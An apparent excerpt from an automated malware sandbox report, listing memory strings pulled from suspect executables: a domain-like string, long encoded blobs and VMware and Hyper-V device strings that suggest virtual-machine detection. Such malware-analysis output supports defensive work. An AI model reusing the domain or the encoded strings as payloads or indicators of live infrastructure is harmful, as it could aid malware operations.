iueg.aappatey.comiueg.aappatey.comFbr+jNKB4R9+J0Q68PjPEPmg3RG1L8sOSIbvG8sOt70gs6qkbl5XK7CaN3xmg4kDoUp6ziOmGMNQO/MUKC/dPib2qWsWHMeuqkZrVkwsBYrdFhrleaplFJHdGaSzOLek1PjbVbJj5NmRXdTZ7CCOeiVOOLuFTy/gmIgzgQXkdUeJIUzJYmMrfJGPSigOHUcDC6ETCE8oGxRuMk1CT8M141yktHtJYm0cQRh0M4ZdbhF347Iz47GMACzBvVagpPp2YbuCs5opcNmnYEz5hMaLmj9QWoC+y/nUT0eNErzqNe4dFmxqCDl3ANI3p40jH45bQJSZhZaehn3PcoUqLZrB1dJnkiiesRX8BPnC7SNJ55C2B1yCeMSgVqVseSgy6eh1blGReXoN/4Cs17Acy54j0rau2kgRodmq0ioocgcNjRVQw+QRds1cbdcvZFvaqjrinY9jpyWOUSRxtmVov7gPB6DEqxiovmOQnjjH6+xYtwxKg4vcFOG7Pwm2yt3oKCjC+CoafPiLkbVrcAppM4K/CBdsyoG9ailH8Q0+l6yQT03XRxuDMm9thoPvTpCMwS7GjMBAMZQROcgzy5j4jzehtoYhbgg/uEiV+haxY0Y5AA3t/eWSokxoWm2a5XjuktGCie5yPQbsKBr3PoLfHgOfk4GNHABPApXYjABIUJlQVeDDAsl1K2C+CUXm+LOU50Dq6ZM0ATVCbqOO3YBGcj0dHhzknOo1FvOXXFKaJiU2MWIBG/LTtFfKuIGxSHYOnjABqgAsHEfu3OrKLnnC7CpAH9CJoEeyY8kAR7ipFJs3VDcHt5Zy0AzvPmk9VEvdFuDYjv5kWm4qr6AaxUEzYcZjPl0mUidilnhGLFYZ3CT0v4A6W4BybOMnyJsXgyZDEBms6nxmAmqFASb2a9cniFd1WShAuTwy4azZ2s7TEdmMYHqp3Q1qriAFImdAb1wPj0LK+XKeiS7aaYX8fxpchpGLJGHWazeezetpfT0VpJr1Q64QgHcMbnwZFQ23TTPL8ycERvYa+v2DGlUmLdRcUa8JvlNv5MnW63qrAoY3MIz4XFdquCuB2O8Saf5uD5XB2XhlSnr7sk3grNdoMQC7oFCiSCM8L5RJ4SH80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6YRFe2KQ0yHIM1qIYj7zj0oSZW5Slt2VgQs8hx01yo6lDVFhiRuON0sQwcb2qNRei3qWLNNFuLdVjjUrzAJ0FHvbwSyBCVdgqWL7Ek2ZfQH2majYYubCIrUCQ2I0bzay8s4kA+AcPNbK6MV3HX0LSc5ymtbjTawsGRGFd2ulQpExVMmjfsHcEAnyDE6s9/TukwBiopsUBAA6V4PZM0sHF4NzVg/RhrGAPuvFXQq9gEMA1ZA8Toc7o7D6Bnz5z8s4kBsCyk2dh+/YI5Ql1g2oRl70R45AWYOpCIrHyOmTExLB+MVDS93CSkucWzaXeY0DP5Al7hNGcCPm7WdU6YLZycMqwaZj1RF/HiYKopVo1ap/KmxOZyAA10YTTzVoON55LbNU9qKzCFpGA5bFS1lXFYb+GJ26BO9rgqnzEqujmAAnxhsKAvzJgN/qrRqasBO2qjbfiYTSCUteopvYX52cPCAiIMPjcaCjyaS9APl/TZZjXVQd6ZDAcwLjKH7UwdHYrUTfhLM259
          Source: 98D7.exe, 00000010.00000003.431710822.000000000051E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rRM8L5RJ4SH80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6Y@sRHIM1qIYj7zj0oSZW5Slt2VgQs8hx01yo6lDVFhiRuON0sQwcb2qNRei3qWLNNFuLdVjjUrzAJ0FHvbwSyBCVdgqWL7Ek2ZfQH2majYYubCIrUCQ2I0bzay8s
          Source: llpb1133.exe, 00000014.00000003.441864243.00000000004D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
          Source: explorer.exe, 00000004.00000000.302351871.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
          Source: 98D7.exe, 00000010.00000003.430490083.00000000004D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0EWumwLZRa4Lr3CR66aQuMjF0JjsptFjmvMXjY9uYDd6xQp6xTyi4/udgr5gwCLgvMd/qs9hbrQ3UToYVwPKe0xULq/ElSdDe9TbRvH1/JLb4/1NFSyC6vvjqn86S4c3XLj+ZEz9Hpe84Zx04fQ9G9hBr5YzeJnxSmCDXoSVE3iCETNneoIRU8g+wYibBT3BWEUeydh5yLb6EL34+4M9TJnRSidMMFHHtWZloqYt8CuvX57oHCVW1F1sW7lpWta8VtHnGk3IQT83p7WUjemUmlP72JYGiM1VTUiu2F9Ub8im0+q1THFTwEKTk3aybTypbrbm8EXyipOYT6dL24JQkZ2xP1nsjAPEyM44WC4ZIEe+OBHODxnbL0v5wx52LUiI69aPte++e8W+ed02Fn+pc1sXTz2pL+tVvoWyJ5RMtldV97A+V4n4P75TtxbNakXZkE5lS9vZtqBcJgd813WDutJ2JZibXNAtGwZB3MIwCNRDDIMw2WSgLN/pjOBOZzhPPxp7JMGbWrBhHFMNnix+nOq7hXtbEKu3V3iS3V7hFfP2igC5ZIAc9IqOmx70iv5LcYrjK5XyrR6pQZ3zFe5vy924s55VKZ8eglbbzXa6MmCpeMRQiDS1LaRECpEWT3knwC7C8rdfEXzi268oReTbry6aklGagrdv3DZ7SQ/bgpLnjJZb5Wr0cVS6iy9Q2nfyGuTb58uU+Pb5UoVvn1+I+PYFSiX9UvLXQnnXVRTfxOFnHNuFY45egQLivFss48e82AH3yA5qE7Ua9umW3pvo+7XfEBfOXSdvTvGwgn/3kuh7v52+k13dSX8a/64x0feQnbg7cDHue5+dHOJdFXTUF1wActQXzCKO+kLEyVFfuHwyRJ4ceGWdSv/I6/HjtR+87KuX4y1Tl7FrZgyo1hMzUyentaalNw+3Kws6nna9KsG2ZNLnc+n0edUeydwp555HH+UBFyuiRgYbXGywxOWUjZl0zYKlUqma9QVP2qWgCxL3sevq7drgCraGNYgRJgYdXTZjQi3tCAHGYakBsJ4XDUtdY1ivSLDenB/V8xHVrjBUG3JrD4o3IQX1ghgt2B+IamPusWlAu18NyajufRz61VA4LNW7bHFQzwVQpR1KiIw05z6d3KgXyC5u1AvWRG7UC5VOBkt7ti2qKo307937u6/cACP9/s2sn1ve6M/fAiOnjnEr6q1iu7msowH4e09g/faykwGD2SxpJaNqtFbmzqhz08XeDWgZ17Tzgyg22DIHgaXWgC48nK6BOa3UjLo3qUetgdC2eqsxuGxYRssaRPmmVl/QoSW8SSBvJ6kYbaMhbu4btMTVfYPZwTK6PtZbg1oZj78GJYhoeqbVW9kTuwrBarSwAB3HqCi7cq3RW09ZhSE93V6oT2bvypRvTRem5wsNq1RTh9hguLKKXq4add0P4WQUbkdKxjCds5aX1cOlExKGpy3OnL1jyZgKrgX7YuSKYdUMy4pZCx4hGYG6MLUwbJxo1CUEt6+cVMfVo7erKXYgVJm55M/8GLsxil/Od/lwUyscGT1+h5TvTMY8t3z8uBZc+7Yey77EMWbte6VkDGfvaNRP6YvLhoThlFUpz2fOzMNsssvVFpLlMM7sPiYcBRj/xVJvYTv9qVL+Vr5hnjtrlY5L+d9WKrWauZGyqrArSHawC1ZvYkkeg0bj34ABHjsoAwysuoZaO3nvZX2UVdIFe+B0Th1hOwiHjMy47YQxtrgw35CQnS21787O37GgJtnOltjDD1rt5rxW9o2EIVg+tnl5OLaenKXezPp9aVLed09NTt52bqEut8rMrct3WSdmbi3tiprFYBbtt+fwwCkMv66KkCazedCXWRGy8pdZ4Wziy6wINeTLrGg9yQg9hbSycdR2eFN79Dp/PT42y/8ZH+P/HD9svzO3v7T5SZ5tmL11Kn/J5Jfz8q4vk09nM0O9FfXjQD67aLR09Pk6CpWM9yi/Pz9WMtutmUXDwtfNxZbWalsDY6U2BmU5eh5tZ7xy94TeboKUUY5ISk1qy1qx3DQarSOGVjUXonhhgzFbr+jNKB4R9+J0Q68PjPEPmg3RG1L8sOSIbvG8sOt70gs6qkbl5XK7CaN3xmg4kDoUp6ziOmGMNQO/MUKC/dPib2qWsWHMeuqkZrVkwsBYrdFhrleaplFJHdGaSzOLek1PjbVbJj5NmRXdTZ7CCOeiVOOLuFTy/gmIgzgQXkdUeJIUzJYmMrfJGPSigOHUcDC6ETCE8oGxRuMk1CT8M141yktHtJYm0cQRh0M4ZdbhF347Iz47GMACzBvVagpPp2YbuCs5opcNmnYEz5hMaLmj9QWoC+y/nUT0eNErzqNe4dFmxqCDl3ANI3p40jH45bQJSZhZaehn3PcoUqLZrB1dJnkiiesRX8BPnC7SNJ55C2B1yCeMSgVqVseSgy6eh1blGReXoN/4Cs17Acy54j0rau2kgRodmq0ioocgcNjRVQw+QRds1cbdcvZFvaqjrinY9jpyWOUSRxtmVov7gPB6DEqxiovmOQnjjH6+xYtwxKg4vcFOG7Pwm2yt3oKCjC+CoafPiLkbVrcAppM4K/CBdsyoG9ailH8Q0+l6yQT03XRxuDMm9thoPvTpCMwS7GjMBAMZQROcgzy5j4jzehtoYhbgg/uEiV+haxY0Y5AA3t/eWSokxoWm2a5XjuktGCie5yPQbsKBr3PoLfHgOfk4GNHABPApXYjABIUJlQVeDDAsl1K2C+CUXm+LOU50Dq6ZM0ATVCbqOO3YBGcj0dHhzknOo1FvOXXFKaJiU2MWIBG/LTtFfKuIGxSHYOnjABqgAsHEfu3OrKLnnC7CpAH9CJoEeyY8kAR7ipFJs3VDcHt5Zy0AzvPmk9VEvdFuDYjv5kWm4qr6AaxUEzYcZjPl0mUidilnhGLFYZ3CT0v4A6W4BybOMnyJsXgyZDEBms6nxmAmqFASb2a9cniFd1WShAuTwy4azZ2s7TEdmMYHqp3Q1qriAFIm
          Source: 98D7.exe, 00000010.00000003.461580588.0000000000519000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.461569848.0000000000516000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkqej
          Source: llpb1133.exe, 00000014.00000003.441864243.00000000004D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UtdY1ivSLDenB/V8xHVrjBUG3JrD4o3IQX1ghgt2B+IamPusWlAu18NyajufRz61VA4LNW7bHFQzwVQpR1KiIw05z6d3KgXyC5u1AvWRG7UC5VOBkt7ti2qKo307937u6/cACP9/s2sn1ve6M/fAiOnjnEr6q1iu7msowH4e09g/faykwGD2SxpJaNqtFbmzqhz08XeDWgZ17Tzgyg22DIHgaXWgC48nK6BOa3UjLo3qUetgdC2eqsxuGxYRssaRPmmVl/QoSW8SSBvJ6kYbaMhbu4btMTVfYPZwTK6PtZbg1oZj78GJYhoeqbVW9kTuwrBarSwAB3HqCi7cq3RW09ZhSE93V6oT2bvypRvTRem5wsNq1RTh9hguLKKXq4add0P4WQUbkdKxjCds5aX1cOlExKGpy3OnL1jyZgKrgX7YuSKYdUMy4pZCx4hGYG6MLUwbJxo1CUEt6+cVMfVo7erKXYgVJm55M/8GLsxil/Od/lwUyscGT1+h5TvTMY8t3z8uBZc+7Yey77EMWbte6VkDGfvaNRP6YvLhoThlFUpz2fOzMNsssvVFpLlMM7sPiYcBRj/xVJvYTv9qVL+Vr5hnjtrlY5L+d9WKrWauZGyqrArSHawC1ZvYkkeg0bj34ABHjsoAwysuoZaO3nvZX2UVdIFe+B0Th1hOwiHjMy47YQxtrgw35CQnS21787O37GgJtnOltjDD1rt5rxW9o2EIVg+tnl5OLaenKXezPp9aVLed09NTt52bqEut8rMrct3WSdmbi3tiprFYBbtt+fwwCkMv66KkCazedCXWRGy8pdZ4Wziy6wINeTLrGg9yQg9hbSycdR2eFN79Dp/PT42y/8ZH+P/HD9svzO3v7T5SZ5tmL11Kn/J5Jfz8q4vk09nM0O9FfXjQD67aLR09Pk6CpWM9yi/Pz9WMtutmUXDwtfNxZbWalsDY6U2BmU5eh5tZ7xy94TeboKUUY5ISk1qy1qx3DQarSOGVjUXonhhgzFbr+jNKB4R9+J0Q68PjPEPmg3RG1L8sOSIbvG8sOt70gs6qkbl5XK7CaN3xmg4kDoUp6ziOmGMNQO/MUKC/dPib2qWsWHMeuqkZrVkwsBYrdFhrleaplFJHdGaSzOLek1PjbVbJj5NmRXdTZ7CCOeiVOOLuFTy/gmIgzgQXkdUeJIUzJYmMrfJGPSigOHUcDC6ETCE8oGxRuMk1CT8M141yktHtJYm0cQRh0M4ZdbhF347Iz47GMACzBvVagpPp2YbuCs5opcNmnYEz5hMaLmj9QWoC+y/nUT0eNErzqNe4dFmxqCDl3ANI3p40jH45bQJSZhZaehn3PcoUqLZrB1dJnkiiesRX8BPnC7SNJ55C2B1yCeMSgVqVseSgy6eh1blGReXoN/4Cs17Acy54j0rau2kgRodmq0ioocgcNjRVQw+QRds1cbdcvZFvaqjrinY9jpyWOUSRxtmVov7gPB6DEqxiovmOQnjjH6+xYtwxKg4vcFOG7Pwm2yt3oKCjC+CoafPiLkbVrcAppM4K/CBdsyoG9ailH8Q0+l6yQT03XRxuDMm9thoPvTpCMwS7GjMBAMZQROcgzy5j4jzehtoYhbgg/uEiV+haxY0Y5AA3t/eWSokxoWm2a5XjuktGCie5yPQbsKBr3PoLfHgOfk4GNHABPApXYjABIUJlQVeDDAsl1K2C+CUXm+LOU50Dq6ZM0ATVCbqOO3YBGcj0dHhzknOo1FvOXXFKaJiU2MWIBG/LTtFfKuIGxSHYOnjABqgAsHEfu3OrKLnnC7CpAH9CJoEeyY8kAR7ipFJs3VDcHt5Zy0AzvPmk9VEvdFuDYjv5kWm4qr6AaxUEzYcZjPl0mUidilnhGLFYZ3CT0v4A6W4BybOMnyJsXgyZDEBms6nxmAmqFASb2a9cniFd1WShAuTwy4azZ2s7TEdmMYHqp3Q1qriAFImdAb1wPj0LK+XKeiS7aaYX8fxpchpGLJGHWazeezetpfT0VpJr1Q64QgHcMbnwZFQ23TTPL8ycERvYa+v2DGlUmLdRcUa8JvlNv5MnW63qrAoY3MIz4XFdquCuB2O8Saf5uD5XB2XhlSnr7sk3grNdoMQC7oFCiSCM8L5RJ4SH80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6YRFe2KQ0yHIM1qIYj7zj0oSZW5Slt2VgQs8hx01yo6lDVFhiRuON0sQwcb2qNRei3qWLNNFuLdVjjUrzAJ0FHvbwSyBCVdgqWL7Ek2ZfQH2majYYubCIrUCQ2I0bzay8s4kA+AcPNbK6MV3HX0LSc5ymtbjTawsGRGFd2ulQpExVMmjfsHcEAnyDE6s9/TukwBiopsUBAA6V4PZM0sHF4NzVg/RhrGAPuvFXQq9gEMA1ZA8Toc7o7D6Bnz5z8s4kBsCyk2dh+/YI5Ql1g2oRl70R45AWYOpCIrHyOmTExLB+MVDS93CSkucWzaXeY0DP5Al7hNGcCPm7WdU6YLZycMqwaZj1RF/HiYKopVo1ap/KmxOZyAA10YTTzVoON55LbNU9qKzCFpGA5bFS1lXFYb+GJ26BO9rgqnzEqujmAAnxhsKAvzJgN/qrRqasBO2qjbfiYTSCUteopvYX52cPCAiIMPjcaCjyaS9APl/TZZjXVQd6ZDAcwLjKH7UwdHYrUTfhLM259YzFS9jjzkdsVw7SnXG/aVBu6AqxTNfh3rCwpPaxZRnkaWDCit007OnU0BV0JXUgMCxrwTl2WwFQxU/LnW/UVS0qxq8JJsmcPbrc6XK5VnbK/BnbnGz/DotlsOegmFuoYo8LmOqZDgaBhy/iy2aYdr8Lmusp/26uFlRKlPdxutXC1gAxdDbdqVd2omKChoad8tX0Sej9GwU1Jtq5eNpuONG4sea3az7wTgV0NWyPoP/OE9yx2ZG4G2
          Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441951171.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000000.302351871.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.290527943.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000004.00000000.302351871.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
          Source: explorer.exe, 00000004.00000000.302351871.0000000008FD3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
          Source: 98D7.exe, 00000010.00000003.432685458.00000000004D6000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.442114467.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.432213204.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.437159148.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.435558228.00000000004D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gzFbr+jNKB4R9+J0Q68PjPEPmg3RG1L8sOSIbvG8sOt70gs6qkbl5XK7CaN3xmg4kDoUp6ziOmGMNQO/MUKC/dPib2qWsWHMeuqkZrVkwsBYrdFhrleaplFJHdGaSzOLek1PjbVbJj5NmRXdTZ7CCOeiVOOLuFTy/gmIgzgQXkdUeJIUzJYmMrfJGPSigOHUcDC6ETCE8oGxRuMk1CT8M141yktHtJYm0cQRh0M4ZdbhF347Iz47GMACzBvVagpPp2YbuCs5opcNmnYEz5hMaLmj9QWoC+y/nUT0eNErzqNe4dFmxqCDl3ANI3p40jH45bQJSZhZaehn3PcoUqLZrB1dJnkiiesRX8BPnC7SNJ55C2B1yCeMSgVqVseSgy6eh1blGReXoN/4Cs17Acy54j0rau2kgRodmq0ioocgcNjRVQw+QRds1cbdcvZFvaqjrinY9jpyWOUSRxtmVov7gPB6DEqxiovmOQnjjH6+xYtwxKg4vcFOG7Pwm2yt3oKCjC+CoafPiLkbVrcAppM4K/CBdsyoG9ailH8Q0+l6yQT03XRxuDMm9thoPvTpCMwS7GjMBAMZQROcgzy5j4jzehtoYhbgg/uEiV+haxY0Y5AA3t/eWSokxoWm2a5XjuktGCie5yPQbsKBr3PoLfHgOfk4GNHABPApXYjABIUJlQVeDDAsl1K2C+CUXm+LOU50Dq6ZM0ATVCbqOO3YBGcj0dHhzknOo1FvOXXFKaJiU2MWIBG/LTtFfKuIGxSHYOnjABqgAsHEfu3OrKLnnC7CpAH9CJoEeyY8kAR7ipFJs3VDcHt5Zy0AzvPmk9VEvdFuDYjv5kWm4qr6AaxUEzYcZjPl0mUidilnhGLFYZ3CT0v4A6W4BybOMnyJsXgyZDEBms6nxmAmqFASb2a9cniFd1WShAuTwy4azZ2s7TEdmMYHqp3Q1qriAFImdAb1wPj0LK+XKeiS7aaYX8fxpchpGLJGHWazeezetpfT0VpJr1Q64QgHcMbnwZFQ23TTPL8ycERvYa+v2DGlUmLdRcUa8JvlNv5MnW63qrAoY3MIz4XFdquCuB2O8Saf5uD5XB2XhlSnr7sk3grNdoMQC7oFCiSCM8L5RJ4SH80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6YRFe2KQ0yHIM1qIYj7zj0oSZW5Slt2VgQs8hx01yo6lDVFhiRuON0sQwcb2qNRei3qWLNNFuLdVjjUrzAJ0FHvbwSyBCVdgqWL7Ek2ZfQH2majYYubCIrUCQ2I0bzay8s4kA+AcPNbK6MV3HX0LSc5ymtbjTawsGRGFd2ulQpExVMmjfsHcEAnyDE6s9/TukwBiopsUBAA6V4PZM0sHF4NzVg/RhrGAPuvFXQq9gEMA1ZA8Toc7o7D6Bnz5z8s4kBsCyk2dh+/YI5Ql1g2oRl70R45AWYOpCIrHyOmTExLB+MVDS93CSkucWzaXeY0DP5Al7hNGcCPm7WdU6YLZycMqwaZj1RF/HiYKopVo1ap/KmxOZyAA10YTTzVoON55LbNU9qKzCFpGA5bFS1lXFYb+GJ26BO9rgqnzEqujmAAnxhsKAvzJgN/qrRqasBO2qjbfiYTSCUteopvYX52cPCAiIMPjcaCjyaS9APl/TZZjXVQd6ZDAcwLjKH7UwdHYrUTfhLM259r
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Fbr+jNKB4R9+J0Q68PjPEPmg3RG1L8sOSIbvG8sOt70gs6qkbl5XK7CaN3xmg4kDoUp6ziOmGMNQO/MUKC/dPib2qWsWHMeuqkZrVkwsBYrdFhrleaplFJHdGaSzOLek1PjbVbJj5NmRXdTZ7CCOeiVOOLuFTy/gmIgzgQXkdUeJIUzJYmMrfJGPSigOHUcDC6ETCE8oGxRuMk1CT8M141yktHtJYm0cQRh0M4ZdbhF347Iz47GMACzBvVagpPp2YbuCs5opcNmnYEz5hMaLmj9QWoC+y/nUT0eNErzqNe4dFmxqCDl3ANI3p40jH45bQJSZhZaehn3PcoUqLZrB1dJnkiiesRX8BPnC7SNJ55C2B1yCeMSgVqVseSgy6eh1blGReXoN/4Cs17Acy54j0rau2kgRodmq0ioocgcNjRVQw+QRds1cbdcvZFvaqjrinY9jpyWOUSRxtmVov7gPB6DEqxiovmOQnjjH6+xYtwxKg4vcFOG7Pwm2yt3oKCjC+CoafPiLkbVrcAppM4K/CBdsyoG9ailH8Q0+l6yQT03XRxuDMm9thoPvTpCMwS7GjMBAMZQROcgzy5j4jzehtoYhbgg/uEiV+haxY0Y5AA3t/eWSokxoWm2a5XjuktGCie5yPQbsKBr3PoLfHgOfk4GNHABPApXYjABIUJlQVeDDAsl1K2C+CUXm+LOU50Dq6ZM0ATVCbqOO3YBGcj0dHhzknOo1FvOXXFKaJiU2MWIBG/LTtFfKuIGxSHYOnjABqgAsHEfu3OrKLnnC7CpAH9CJoEeyY8kAR7ipFJs3VDcHt5Zy0AzvPmk9VEvdFuDYjv5kWm4qr6AaxUEzYcZjPl0mUidilnhGLFYZ3CT0v4A6W4BybOMnyJsXgyZDEBms6nxmAmqFASb2a9cniFd1WShAuTwy4azZ2s7TEdmMYHqp3Q1qriAFImdAb1wPj0LK+XKeiS7aaYX8fxpchpGLJGHWazeezetpfT0VpJr1Q64QgHcMbnwZFQ23TTPL8ycERvYa+v2DGlUmLdRcUa8J